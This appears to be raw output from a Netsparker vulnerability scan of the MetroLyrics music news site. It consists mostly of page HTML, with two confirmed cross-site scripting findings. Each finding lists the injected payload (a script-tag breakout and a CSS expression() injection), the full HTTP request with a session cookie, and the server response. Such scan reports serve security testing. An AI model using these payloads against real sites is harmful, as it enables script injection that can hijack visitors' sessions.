<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Kylie Minogue","sectionURL":"kylie-minogue-lyrics.html","title":"Kylie Minogue cries while talking about cancer battle"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460904?"></script>

<div id="header">

<h1>Kylie Minogue cries while talking about cancer battle</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460904?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/6747KylieMinogueProfile.jpg" alt="Kylie Minogue" width="166" />
<h2><a href="kylie-minogue-overview.html" title="Kylie Minogue Overview">Kylie Minogue</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=6747" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/kylie-minogue/6747/0">
<li><a title="Kylie Minogue Overview" href="/kylie-minogue-overview.html" >Overview</a></li>
<li><a title="Kylie Minogue News" href="/kylie-minogue-gossip-news.html" >News</a></li>
<li><a title="Kylie Minogue Awards" href="/kylie-minogue-awards-featured.html" >Awards</a></li>
<li><a title="Kylie Minogue Albums" href="/kylie-minogue-albums-list.html" >Albums</a></li>
<li><a title="Kylie Minogue Lyrics" href="/kylie-minogue-lyrics.html" >Lyrics</a></li>
<li><a title="Kylie Minogue Videos" href="/kylie-minogue-music-videos.html" >Videos</a></li>
<li><a title="Kylie Minogue Pictures" href="/kylie-minogue-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460904?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name=&..
- /2011-phil-collins-quits-music-business-news.html

/2011-phil-collins-quits-music-business-news.html CONFIRMED

http://www.metrolyrics.com/2011-phil-collins-quits-music-business-news.html?'"--></style></script><s..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00078E)</script>

Request

GET /2011-phil-collins-quits-music-business-news.html?'"--></style></script><script>netsparker(0x00078E)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10153
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:45 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Phil Collins quits music business News about Phil Collins" />
<meta name="keywords" content="Phil Collins quits music business" />
<meta property="fb:page_id" content="81914997331" />
<title>PHIL COLLINS QUITS MUSIC BUSINESS</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Phil Collins","sectionURL":"phil-collins-lyrics.html","title":"Phil Collins quits music business"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460905?"></script>

<div id="header">

<h1>Phil Collins quits music business</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460905?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/9409PhilCollinsProfile.jpg" alt="Phil Collins" width="166" />
<h2><a href="phil-collins-overview.html" title="Phil Collins Overview">Phil Collins</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=9409" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/phil-collins/9409/0">
<li><a title="Phil Collins Overview" href="/phil-collins-overview.html" >Overview</a></li>
<li><a title="Phil Collins News" href="/phil-collins-gossip-news.html" >News</a></li>
<li><a title="Phil Collins Awards" href="/phil-collins-awards-featured.html" >Awards</a></li>
<li><a title="Phil Collins Albums" href="/phil-collins-albums-list.html" >Albums</a></li>
<li><a title="Phil Collins Lyrics" href="/phil-collins-lyrics.html" >Lyrics</a></li>
<li><a title="Phil Collins Videos" href="/phil-collins-music-videos.html" >Videos</a></li>
<li><a title="Phil Collins Pictures" href="/phil-collins-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460905?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our iPhone app?</p>
<ul id="pollresults">
<li style="display:none"></li>
<li><input type="radio" name="poll" value="5_18" />Yes! Love It</li><li><input type="radio" name="poll" value="5_..
- /2011-carl-barat-says-libertines-wont-perform-at-glastonbury-news.html

/2011-carl-barat-says-libertines-wont-perform-at-glastonbury-news.html CONFIRMED

http://www.metrolyrics.com/2011-carl-barat-says-libertines-wont-perform-at-glastonbury-news.html?nse..

Parameters

Parameter Type Value
nsextt GET " stYle=x:expre/**/ssion(alert(9)) ns="

Request

GET /2011-carl-barat-says-libertines-wont-perform-at-glastonbury-news.html?nsextt=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22 HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 9703
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:21:50 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Carl Barat says Libertines won&#039;t perform at Glastonbury News about Carl Barat" />
<meta name="keywords" content="Carl Barat says Libertines won&#039;t perform at Glastonbury" />
<meta property="fb:page_id" content="81914997331" />
<title>CARL BARAT SAYS LIBERTINES WON&#039;T PERFORM AT GLASTONBURY</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Carl Barat","sectionURL":"carl-barat-lyrics.html","title":"Carl Barat says Libertines won&#039;t perform at Glastonbury"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
